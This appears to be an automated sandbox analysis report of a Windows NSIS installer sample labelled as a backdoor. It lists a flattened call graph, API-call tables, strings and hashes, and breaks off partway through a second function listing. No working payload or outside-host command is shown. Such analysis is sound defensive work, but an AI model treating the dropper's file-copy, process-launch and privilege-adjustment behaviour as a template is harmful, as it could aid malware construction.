3434->3435 3436 4060bc WriteFile 3434->3436 3435->3434 3436->3434 3437->3431 3439 40557c 24 API calls 3438->3439 3439->3431 3448 40608d ReadFile 3441->3448 3444->3295 3446 4060da 3445->3446 3446->3431 3447->3423 3449 4034bf 3448->3449 3449->3303 3450->3311 3452 403eb3 3451->3452 3467 406461 wsprintfW 3452->3467 3454 403f24 3468 403f58 3454->3468 3456 403c54 3456->3317 3457 403f29 3457->3456 3458 406557 17 API calls 3457->3458 3458->3457 3459->3319 3471 4044c2 3460->3471 3462 4044c2 SendMessageW 3463 4056ab OleUninitialize 3462->3463 3463->3349 3465 405699 3465->3462 3466 405672 3466->3465 3474 401389 3466->3474 3467->3454 3469 406557 17 API calls 3468->3469 3470 403f66 SetWindowTextW 3469->3470 3470->3457 3472 4044da 3471->3472 3473 4044cb SendMessageW 3471->3473 3472->3466 3473->3472 3476 401390 3474->3476 3475 4013fe 3475->3466 3476->3475 3477 4013cb MulDiv SendMessageW 3476->3477 3477->3476 3478->3364 3480 406866 FindClose 3479->3480 3481 406871 3479->3481 3480->3481 3481->3375 3483 406190 3482->3483 3484 4061b6 GetShortPathNameW 3482->3484 3509 40600a GetFileAttributesW CreateFileW 3483->3509 3486 4062d5 3484->3486 3487 4061cb 3484->3487 3486->3382 3487->3486 3489 4061d3 wsprintfA 3487->3489 3488 40619a CloseHandle GetShortPathNameW 3488->3486 3490 4061ae 3488->3490 3491 406557 17 API calls 3489->3491 3490->3484 3490->3486 3492 4061fb 3491->3492 3510 40600a GetFileAttributesW CreateFileW 3492->3510 3494 406208 3494->3486 3495 406217 GetFileSize GlobalAlloc 3494->3495 3496 406239 3495->3496 3497 4062ce CloseHandle 3495->3497 3498 40608d ReadFile 3496->3498 3497->3486 3499 406241 3498->3499 3499->3497 3511 405f6f lstrlenA 3499->3511 3502 406258 lstrcpyA 3505 40627a 3502->3505 3503 40626c 3504 405f6f 4 API calls 3503->3504 3504->3505 3506 4062b1 SetFilePointer 3505->3506 3507 4060bc WriteFile 3506->3507 3508 4062c7 GlobalFree 3507->3508 3508->3497 3509->3488 3510->3494 3512 405fb0 lstrlenA 3511->3512 3513 405fb8 3512->3513 3514 405f89 lstrcmpiA 3512->3514 3513->3502 3513->3503 3514->3513 3515 405fa7 CharNextA 3514->3515 3515->3512 4213 40248a 4214 402da6 17 API calls 4213->4214 4215 40249c 4214->4215 4216 402da6 17 API calls 4215->4216 4217 4024a6 4216->4217 4230 402e36 4217->4230 4220 40292e 4221 4024de 4223 4024ea 4221->4223 4225 402d84 17 API calls 4221->4225 4222 402da6 17 API calls 4224 4024d4 lstrlenW 4222->4224 4226 402509 RegSetValueExW 4223->4226 4228 4032b4 31 API calls 4223->4228 4224->4221 4225->4223 4227 40251f RegCloseKey 4226->4227 4227->4220 4228->4226 4231 402e51 4230->4231 4234 4063b5 4231->4234 4235 4063c4 4234->4235 4236 4024b6 4235->4236 4237 4063cf RegCreateKeyExW 4235->4237 4236->4220 4236->4221 4236->4222 4237->4236 4238 40290b 4239 402da6 17 API calls 4238->4239 4240 402912 FindFirstFileW 4239->4240 4241 40293a 4240->4241 4245 402925 4240->4245 4246 406461 wsprintfW 4241->4246 4243 402943 4247 40651a lstrcpynW 4243->4247 4246->4243 4247->4245 4248 40190c 4249 401943 4248->4249 4250 402da6 17 API calls 4249->4250 4251 401948 4250->4251 4252 405c26 67 API calls 4251->4252 4253 401951 4252->4253 4254 40190f 4255 402da6 17 API calls 4254->4255 4256 401916 4255->4256 4257 405b7a MessageBoxIndirectW 4256->4257 4258 40191f 4257->4258 4259 401491 4260 40557c 24 API calls 4259->4260 4261 401498 4260->4261 4262 402891 4263 402898 4262->4263 4264 402ba9 4262->4264 4265 402d84 17 API calls 4263->4265 4266 40289f 4265->4266 4267 4028ae SetFilePointer 4266->4267 4267->4264 4268 4028be 4267->4268 4270 406461 wsprintfW 4268->4270 4270->4264 3143 401f12 3144 402da6 17 API calls 3143->3144 3145 401f18 3144->3145 3146 402da6 17 API calls 3145->3146 3147 401f21 3146->3147 3148 402da6 17 API calls 3147->3148 3149 401f2a 3148->3149 3150 402da6 17 API calls 3149->3150 3151 401f33 3150->3151 3152 401423 24 API calls 3151->3152 3153 401f3a 3152->3153 3160 405b40 ShellExecuteExW 3153->3160 3155 40292e 3156 401f82 3156->3155 3161 406992 WaitForSingleObject 3156->3161 3158 401f9f CloseHandle 3158->3155 3160->3156 3162 4069ac 3161->3162 3163 4069be GetExitCodeProcess 3162->3163 3166 406923 3162->3166 3163->3158 3167 406940 PeekMessageW 3166->3167 3168 406950 WaitForSingleObject 3167->3168 3169 406936 DispatchMessageW 3167->3169 3168->3162 3169->3167 4271 402f93 4272 402fa5 SetTimer 4271->4272 4273 402fbe 4271->4273 4272->4273 4274 403013 4273->4274 4275 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4273->4275 4275->4274 4276 401d17 4277 402d84 17 API calls 4276->4277 4278 401d1d IsWindow 4277->4278 4279 401a20 4278->4279 4280 401b9b 4281 401bec 4280->4281 4282 401ba8 4280->4282 4284 401bf1 4281->4284 4285 401c16 GlobalAlloc 4281->4285 4283 401c31 4282->4283 4288 401bbf 4282->4288 4286 406557 17 API calls 4283->4286 4295 40239d 4283->4295 4284->4295 4301 40651a lstrcpynW 4284->4301 4287 406557 17 API calls 4285->4287 4289 402397 4286->4289 4287->4283 4299 40651a lstrcpynW 4288->4299 4293 405b7a MessageBoxIndirectW 4289->4293 4292 401c03 GlobalFree 4292->4295 4293->4295 4294 401bce 4300 40651a lstrcpynW 4294->4300 4297 401bdd 4302 40651a lstrcpynW 4297->4302 4299->4294 4300->4297 4301->4292 4302->4295 4303 40261c 4304 402da6 17 API calls 4303->4304 4305 402623 4304->4305 4308 40600a GetFileAttributesW CreateFileW 4305->4308 4307 40262f 4308->4307 4309 40149e 4310 4014ac PostQuitMessage 4309->4310 4311 40239d 4309->4311 4310->4311 4312 40259e 4322 402de6 4312->4322 4315 402d84 17 API calls 4316 4025b1 4315->4316 4317 4025d9 RegEnumValueW 4316->4317 4318 4025cd RegEnumKeyW 4316->4318 4320 40292e 4316->4320 4319 4025ee RegCloseKey 4317->4319 4318->4319 4319->4320 4323 402da6 17 API calls 4322->4323 4324 402dfd 4323->4324 4325 406387 RegOpenKeyExW 4324->4325 4326 4025a8 4325->4326 4326->4315 4327 404920 4328 404930 4327->4328 4329 404956 4327->4329 4330 404476 18 API calls 4328->4330 4331 4044dd 8 API calls 4329->4331 4332 40493d SetDlgItemTextW 4330->4332 4333 404962 4331->4333 4332->4329 4334 4015a3 4335 402da6 17 API calls 4334->4335 4336 4015aa SetFileAttributesW 4335->4336 4337 4015bc 4336->4337 4338 401fa4 4339 402da6 17 API calls 4338->4339 4340 401faa 4339->4340 4341 40557c 24 API calls 4340->4341 4342 401fb4 4341->4342 4343 405afd 2 API calls 4342->4343 4344 401fba 4343->4344 4345 401fdd CloseHandle 4344->4345 4347 406992 5 API calls 4344->4347 4348 40292e 4344->4348 4345->4348 4349 401fcf 4347->4349 4349->4345 4351 406461 wsprintfW 4349->4351 4351->4345 4352 40202a 4353 402da6 17 API calls 4352->4353 4354 402031 4353->4354 4355 4068e7 5 API calls 4354->4355 4356 402040 4355->4356 4357 40205c GlobalAlloc 4356->4357 4362 4020cc 4356->4362 4358 402070 4357->4358 4357->4362 4359 4068e7 5 API calls 4358->4359 4360 402077 4359->4360 4361 4068e7 5 API calls 4360->4361 4363 402081 4361->4363 4363->4362 4367 406461 wsprintfW 4363->4367 4365 4020ba 4368 406461 wsprintfW 4365->4368 4367->4365 4368->4362 4369 40252a 4370 402de6 17 API calls 4369->4370 4371 402534 4370->4371 4372 402da6 17 API calls 4371->4372 4373 40253d 4372->4373 4374 402548 RegQueryValueExW 4373->4374 4375 40292e 4373->4375 4376 402568 4374->4376 4379 40256e RegCloseKey 4374->4379 4376->4379 4380 406461 wsprintfW 4376->4380 4379->4375 4380->4379 4381 4021aa 4382 402da6 17 API calls 4381->4382 4383 4021b1 4382->4383 4384 402da6 17 API calls 4383->4384 4385 4021bb 4384->4385 4386 402da6 17 API calls 4385->4386 4387 4021c5 4386->4387 4388 402da6 17 API calls 4387->4388 4389 4021cf 4388->4389 4390 402da6 17 API calls 4389->4390 4391 4021d9 4390->4391 4392 402218 CoCreateInstance 4391->4392 4393 402da6 17 API calls 4391->4393 4395 402237 4392->4395 4393->4392 4394 401423 24 API calls 4396 4022f6 4394->4396 4395->4394 4395->4396 4397 4045ac lstrcpynW lstrlenW 4398 401a30 4399 402da6 17 API calls 4398->4399 4400 401a39 ExpandEnvironmentStringsW 4399->4400 4401 401a4d 4400->4401 4403 401a60 4400->4403 4402 401a52 lstrcmpW 4401->4402 4401->4403 4402->4403 4409 4023b2 4410 4023ba 4409->4410 4412 4023c0 4409->4412 4411 402da6 17 API calls 4410->4411 4411->4412 4413 402da6 17 API calls 4412->4413 4414 4023ce 4412->4414 4413->4414 4415 4023dc 4414->4415 4416 402da6 17 API calls 4414->4416 4417 402da6 17 API calls 4415->4417 4416->4415 4418 4023e5 WritePrivateProfileStringW 4417->4418 4419 402434 4420 402467 4419->4420 4421 40243c 4419->4421 4422 402da6 17 API calls 4420->4422 4423 402de6 17 API calls 4421->4423 4424 40246e 4422->4424 4425 402443 4423->4425 4430 402e64 4424->4430 4427 402da6 17 API calls 4425->4427 4429 40247b 4425->4429 4428 402454 RegDeleteValueW RegCloseKey 4427->4428 4428->4429 4431 402e71 4430->4431 4432 402e78 4430->4432 4431->4429 4432->4431 4434 402ea9 4432->4434 4435 406387 RegOpenKeyExW 4434->4435 4436 402ed7 4435->4436 4437 402ee7 RegEnumValueW 4436->4437 4444 402f0a 4436->4444 4445 402f81 4436->4445 4438 402f71 RegCloseKey 4437->4438 4437->4444 4438->4445 4439 402f46 RegEnumKeyW 4440 402f4f RegCloseKey 4439->4440 4439->4444 4441 4068e7 5 API calls 4440->4441 4443 402f5f 4441->4443 4442 402ea9 6 API calls 4442->4444 4443->4445 4446 402f63 RegDeleteKeyW 4443->4446 4444->4438 4444->4439 4444->4440 4444->4442 4445->4431 4446->4445 4447 401735 4448 402da6 17 API calls 4447->4448 4449 40173c SearchPathW 4448->4449 4450 401757 4449->4450 4451 404635 4452 40464d 4451->4452 4454 404767 4451->4454 4457 404476 18 API calls 4452->4457 4453 4047d1 4455 40489b 4453->4455 4456 4047db GetDlgItem 4453->4456 4454->4453 4454->4455 4460 4047a2 GetDlgItem SendMessageW 4454->4460 4462 4044dd 8 API calls 4455->4462 4458 4047f5 4456->4458 4459 40485c 4456->4459 4461 4046b4 4457->4461 4458->4459 4466 40481b SendMessageW LoadCursorW SetCursor 4458->4466 4459->4455 4463 40486e 4459->4463 4484 404498 EnableWindow 4460->4484 4465 404476 18 API calls 4461->4465 4472 404896 4462->4472 4467 404884 4463->4467 4468 404874 SendMessageW 4463->4468 4470 4046c1 CheckDlgButton 4465->4470 4485 4048e4 4466->4485 4467->4472 4473 40488a SendMessageW 4467->4473 4468->4467 4469 4047cc 4474 4048c0 SendMessageW 4469->4474 4482 404498 EnableWindow 4470->4482 4473->4472 4474->4453 4477 4046df GetDlgItem 4483 4044ab SendMessageW 4477->4483 4479 4046f5 SendMessageW 4480 404712 GetSysColor 4479->4480 4481 40471b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4479->4481 4480->4481 4481->4472 4482->4477 4483->4479 4484->4469 4488 405b40 ShellExecuteExW 4485->4488 4487 40484a LoadCursorW SetCursor 4487->4459 4488->4487 4489 401d38 4490 402d84 17 API calls 4489->4490 4491 401d3f 4490->4491 4492 402d84 17 API calls 4491->4492 4493 401d4b GetDlgItem 4492->4493 4494 402638 4493->4494 4495 4014b8 4496 4014be 4495->4496 4497 401389 2 API calls 4496->4497 4498 4014c6 4497->4498 4499 4056bb 4500 405865 4499->4500 4501 4056dc GetDlgItem GetDlgItem GetDlgItem 4499->4501 4502 405896 4500->4502 4503 40586e GetDlgItem CreateThread CloseHandle 4500->4503 4544 4044ab SendMessageW 4501->4544 4506 4058e6 4502->4506 4507 4058ad ShowWindow ShowWindow 4502->4507 4509 4058c1 4502->4509 4503->4502 4505 40574c 4510 405753 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4505->4510 4514 4044dd 8 API calls 4506->4514 4546 4044ab SendMessageW 4507->4546 4508 405921 4508->4506 4517 40592f SendMessageW 4508->4517 4509->4508 4512 4058d5 4509->4512 4513 4058fb ShowWindow 4509->4513 4515 4057c1 4510->4515 4516 4057a5 SendMessageW SendMessageW 4510->4516 4518 40444f SendMessageW 4512->4518 4520 40591b 4513->4520 4521 40590d 4513->4521 4519 4058f4 4514->4519 4523 4057d4 4515->4523 4524 4057c6 SendMessageW 4515->4524 4516->4515 4517->4519 4525 405948 CreatePopupMenu 4517->4525 4518->4506 4522 40444f SendMessageW 4520->4522 4526 40557c 24 API calls 4521->4526 4522->4508 4528 404476 18 API calls 4523->4528 4524->4523 4527 406557 17 API calls 4525->4527 4526->4520 4529 405958 AppendMenuW 4527->4529 4530 4057e4 4528->4530 4531 405975 GetWindowRect 4529->4531 4532 405988 TrackPopupMenu 4529->4532 4533 405821 GetDlgItem SendMessageW 4530->4533 4534 4057ed ShowWindow 4530->4534 4531->4532 4532->4519 4535 4059a3 4532->4535 4533->4519 4537 405848 SendMessageW SendMessageW 4533->4537 4536 405803 ShowWindow 4534->4536 4539 405810 4534->4539 4538 4059bf SendMessageW 4535->4538 4536->4539 4537->4519 4538->4538 4540 4059dc OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4538->4540 4545 4044ab SendMessageW 4539->4545 4542 405a01 SendMessageW 4540->4542 4542->4542 4543 405a2a GlobalUnlock SetClipboardData CloseClipboard 4542->4543 4543->4519 4544->4505 4545->4533 4546->4509 4547 404cbd 4548 404ce9 4547->4548 4549 404ccd 4547->4549 4551 404d1c 4548->4551 4552 404cef SHGetPathFromIDListW 4548->4552 4558 405b5e GetDlgItemTextW 4549->4558 4554 404d06 SendMessageW 4552->4554 4555 404cff 4552->4555 4553 404cda SendMessageW 4553->4548 4554->4551 4556 40140b 2 API calls 4555->4556 4556->4554 4558->4553 4559 40263e 4560 402652 4559->4560 4561 40266d 4559->4561 4562 402d84 17 API calls 4560->4562 4563 402672 4561->4563 4564 40269d 4561->4564 4573 402659 4562->4573 4566 402da6 17 API calls 4563->4566 4565 402da6 17 API calls 4564->4565 4567 4026a4 lstrlenW 4565->4567 4568 402679 4566->4568 4567->4573 4576 40653c WideCharToMultiByte 4568->4576 4570 40268d lstrlenA 4570->4573 4571 4026d1 4572 4026e7 4571->4572 4574 4060bc WriteFile 4571->4574 4573->4571 4573->4572 4575 4060eb 5 API calls 4573->4575 4574->4572 4575->4571 4576->4570

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 40350a-40355a SetErrorMode GetVersionExW 1 403594-40359b 0->1 2 40355c-403590 GetVersionExW 0->2 3 4035a5-4035e5 1->3 4 40359d 1->4 2->1 5 4035e7-4035ef call 4068e7 3->5 6 4035f8 3->6 4->3 5->6 12 4035f1 5->12 7 4035fd-403611 call 406877 lstrlenA 6->7 13 403613-40362f call 4068e7 * 3 7->13 12->6 20 403640-4036a2 #17 OleInitialize SHGetFileInfoW call 40651a GetCommandLineW call 40651a 13->20 21 403631-403637 13->21 28 4036a4-4036a6 20->28 29 4036ab-4036be call 405e16 CharNextW 20->29 21->20 26 403639 21->26 26->20 28->29 32 4037b5-4037bb 29->32 33 4037c1 32->33 34 4036c3-4036c9 32->34 37 4037d5-4037ef GetTempPathW call 4034d9 33->37 35 4036d2-4036d8 34->35 36 4036cb-4036d0 34->36 39 4036da-4036de 35->39 40 4036df-4036e3 35->40 36->35 36->36 44 4037f1-40380f GetWindowsDirectoryW lstrcatW call 4034d9 37->44 45 403847-40385f DeleteFileW call 40307d 37->45 39->40 42 4037a3-4037b1 call 405e16 40->42 43 4036e9-4036ef 40->43 42->32 61 4037b3-4037b4 42->61 47 4036f1-4036f8 43->47 48 403709-403742 43->48 44->45 64 403811-403841 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034d9 44->64 66 403865-40386b 45->66 67 403a36-403a44 ExitProcess OleUninitialize 45->67 54 4036fa-4036fd 47->54 55 4036ff 47->55 49 403744-403749 48->49 50 40375e-403798 48->50 49->50 56 40374b-403753 49->56 58 4037a0-4037a2 50->58 59 40379a-40379e 50->59 54->48 54->55 55->48 62 403755-403758 56->62 63 40375a 56->63 58->42 59->58 65 4037c3-4037d0 call 40651a 59->65 61->32 62->50 62->63 63->50 64->45 64->67 65->37 71 403871-403884 call 405e16 66->71 72 403912-403919 call 403bc9 66->72 68 403a46-403a55 call 405b7a ExitProcess 67->68 69 403a5b-403a61 67->69 75 403a63-403a78 GetCurrentProcess OpenProcessToken 69->75 76 403ad9-403ae1 69->76 87 4038d6-4038e3 71->87 88 403886-4038bb 71->88 80 40391e-403921 72->80 84 403aa9-403ab7 call 4068e7 75->84 85 403a7a-403aa3 LookupPrivilegeValueW AdjustTokenPrivileges 75->85 81 403ae3 76->81 82 403ae6-403ae9 ExitProcess 76->82 80->67 81->82 98 403ac5-403ad0 ExitWindowsEx 84->98 99 403ab9-403ac3 84->99 85->84 91 4038e5-4038f3 call 405ef1 87->91 92 403926-40393a call 405ae5 lstrcatW 87->92 90 4038bd-4038c1 88->90 94 4038c3-4038c8 90->94 95 4038ca-4038d2 90->95 91->67 107 4038f9-40390f call 40651a * 2 91->107 105 403947-403961 lstrcatW lstrcmpiW 92->105 106 40393c-403942 lstrcatW 92->106 94->95 101 4038d4 94->101 95->90 95->101 98->76 100 403ad2-403ad4 call 40140b 98->100 99->98 99->100 100->76 101->87 109 403a34 105->109 110 403967-40396a 105->110 106->105 107->72 109->67 112 403973 call 405ac8 110->112 113 40396c-403971 call 405a4b 110->113 119 403978-403988 SetCurrentDirectoryW 112->119 113->119 121 403995-4039c1 call 40651a 119->121 122 40398a-403990 call 40651a 119->122 126 4039c6-4039e1 call 406557 DeleteFileW 121->126 122->121 129 403a21-403a2b 126->129 130 4039e3-4039f3 CopyFileW 126->130 129->126 132 403a2d-403a2f call 4062da 129->132 130->129 131 4039f5-403a15 call 4062da call 406557 call 405afd 130->131 131->129 140 403a17-403a1e CloseHandle 131->140 132->109 140->129
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008001), ref: 0040352D
                                                      • GetVersionExW.KERNEL32(?), ref: 00403556
                                                      • GetVersionExW.KERNEL32(0000011C), ref: 0040356D
                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403604
                                                      • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403640
                                                      • OleInitialize.OLE32(00000000), ref: 00403647
                                                      • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 00403665
                                                      • GetCommandLineW.KERNEL32(007A7A60,NSIS Error), ref: 0040367A
                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe",00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe",00000000), ref: 004036B3
                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,?), ref: 004037E6
                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004037F7
                                                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403803
                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403817
                                                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 0040381F
                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403830
                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 00403838
                                                      • DeleteFileW.KERNELBASE(1033), ref: 0040384C
                                                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu), ref: 00403933
                                                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A26C), ref: 00403942
                                                        • Part of subcall function 00405AC8: CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00405ACE
                                                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp), ref: 0040394D
                                                      • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe",00000000,?), ref: 00403959
                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 00403979
                                                      • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,?), ref: 004039D8
                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,0079F708,00000001), ref: 004039EB
                                                      • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000), ref: 00403A18
                                                      • ExitProcess.KERNEL32(?), ref: 00403A36
                                                      • OleUninitialize.OLE32(?), ref: 00403A3B
                                                      • ExitProcess.KERNEL32 ref: 00403A55
                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A69
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403A70
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A84
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AA3
                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AC8
                                                      • ExitProcess.KERNEL32 ref: 00403AE9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                      • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                      • API String ID: 2292928366-3962130039
                                                      • Opcode ID: cae39c1e9e6ca513e479b9447da8aa631f95b308384d32b1bc95edec7b3108ac
                                                      • Instruction ID: 53a60b58fdbd25313d51bce5ca3a2b86b24fade18f433b590921527e5da6acff
                                                      • Opcode Fuzzy Hash: cae39c1e9e6ca513e479b9447da8aa631f95b308384d32b1bc95edec7b3108ac
                                                      • Instruction Fuzzy Hash: B2E1F8B0A00214ABD720AFB59D45ABF3AB8EB45705F10807EF581B62D1DB7C8B41CB6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 141 403bc9-403be1 call 4068e7 144 403be3-403bee GetUserDefaultUILanguage call 406461 141->144 145 403bf5-403c2c call 4063e8 141->145 148 403bf3 144->148 151 403c44-403c4a lstrcatW 145->151 152 403c2e-403c3f call 4063e8 145->152 150 403c4f-403c78 call 403e9f call 405ef1 148->150 158 403d0a-403d12 call 405ef1 150->158 159 403c7e-403c83 150->159 151->150 152->151 165 403d20-403d45 LoadImageW 158->165 166 403d14-403d1b call 406557 158->166 159->158 160 403c89-403cb1 call 4063e8 159->160 160->158 167 403cb3-403cb7 160->167 169 403dc6-403dce call 40140b 165->169 170 403d47-403d77 RegisterClassW 165->170 166->165 171 403cc9-403cd5 lstrlenW 167->171 172 403cb9-403cc6 call 405e16 167->172 184 403dd0-403dd3 169->184 185 403dd8-403de3 call 403e9f 169->185 173 403e95 170->173 174 403d7d-403dc1 SystemParametersInfoW CreateWindowExW 170->174 178 403cd7-403ce5 lstrcmpiW 171->178 179 403cfd-403d05 call 405de9 call 40651a 171->179 172->171 177 403e97-403e9e 173->177 174->169 178->179 183 403ce7-403cf1 GetFileAttributesW 178->183 179->158 188 403cf3-403cf5 183->188 189 403cf7-403cf8 call 405e35 183->189 184->177 193 403de9-403e03 ShowWindow call 406877 185->193 194 403e6c-403e74 call 40564f 185->194 188->179 188->189 189->179 201 403e05-403e0a call 406877 193->201 202 403e0f-403e21 GetClassInfoW 193->202 199 403e76-403e7c 194->199 200 403e8e-403e90 call 40140b 194->200 199->184 203 403e82-403e89 call 40140b 199->203 200->173 201->202 206 403e23-403e33 GetClassInfoW RegisterClassW 202->206 207 403e39-403e6a DialogBoxParamW call 40140b call 403b19 202->207 203->184 206->207 207->177
                                                      APIs
                                                        • Part of subcall function 004068E7: GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
                                                        • Part of subcall function 004068E7: GetProcAddress.KERNEL32(00000000,?), ref: 00406914
                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,?,00000000,?), ref: 00403BE3
                                                        • Part of subcall function 00406461: wsprintfW.USER32 ref: 0040646E
                                                      • lstrcatW.KERNEL32(1033,007A1F48), ref: 00403C4A
                                                      • lstrlenW.KERNEL32(open cmd,?,?,?,open cmd,00000000,007B3800,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,771B3420), ref: 00403CCA
                                                      • lstrcmpiW.KERNEL32(?,.exe,open cmd,?,?,?,open cmd,00000000,007B3800,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403CDD
                                                      • GetFileAttributesW.KERNEL32(open cmd,?,00000000,?), ref: 00403CE8
                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,007B3800), ref: 00403D31
                                                      • RegisterClassW.USER32(007A7A00), ref: 00403D6E
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D86
                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DBB
                                                      • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DF1
                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403E1D
                                                      • GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403E2A
                                                      • RegisterClassW.USER32(007A7A00), ref: 00403E33
                                                      • DialogBoxParamW.USER32(?,00000000,00403F77,00000000), ref: 00403E52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
